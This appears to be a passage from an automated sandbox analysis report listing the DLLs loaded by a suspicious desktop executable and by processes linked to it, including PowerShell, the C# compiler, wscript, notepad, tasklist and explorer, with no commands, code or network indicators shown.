              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\yjYJ8QncaF.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\explorer.exeSection loaded: aepic.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
              Source: C:\Windows\explorer.exeSection loaded: userenv.dll
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: propsys.dll
              Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
              Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\explorer.exeSection loaded: wininet.dll
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
              Source: C:\Windows\explorer.exeSection loaded: wldp.dll
              Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
              Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
              Source: C:\Windows\explorer.exeSection loaded: netutils.dll
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
              Source: C:\Windows\explorer.exeSection loaded: ninput.dll
              Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
              Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\explorer.exeSection loaded: slc.dll
              Source: C:\Windows\explorer.exeSection loaded: sppc.dll
              Source: C:\Windows\explorer.exeSection loaded: profapi.dll
              Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\explorer.exeSection loaded: idstore.dll
              Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
              Source: C:\Windows\explorer.exeSection loaded: samcli.dll
              Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
              Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\explorer.exeSection loaded: winsta.dll
              Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
              Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
              Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
              Source: C:\Windows\explorer.exeSection loaded: devobj.dll
              Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
              Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
              Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
              Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
              Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
              Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
              Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
              Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
              Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
              Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
              Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
              Source: C:\Windows\explorer.exeSection loaded: appextension.dll
              Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
              Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
              Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
              Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
              Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
              Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
              Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
              Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
              Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
              Source: C:\Windows\explorer.exeSection loaded: wincorlib.dll
              Source: C:\Windows\explorer.exeSection loaded: cdp.dll
              Source: C:\Windows\explorer.exeSection loaded: dsreg.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dll
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dll
              Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dll
              Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\explorer.exeSection loaded: thumbcache.dll
              Source: C:\Windows\explorer.exeSection loaded: edputil.dll
              Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dll
              Source: C:\Windows\explorer.exeSection loaded: ntshrui.dll
              Source: C:\Windows\explorer.exeSection loaded: cscapi.dll
              Source: C:\Windows\explorer.exeSection loaded: linkinfo.dll
              Source: C:\Windows\explorer.exeSection loaded: secur32.dll
              Source: C:\Windows\explorer.exeSection loaded: version.dll
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
              Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dll
              Source: C:\Windows\explorer.exeSection loaded: cscui.dll
              Source: C:\Windows\explorer.exeSection loaded: provsvc.dll
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
              Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
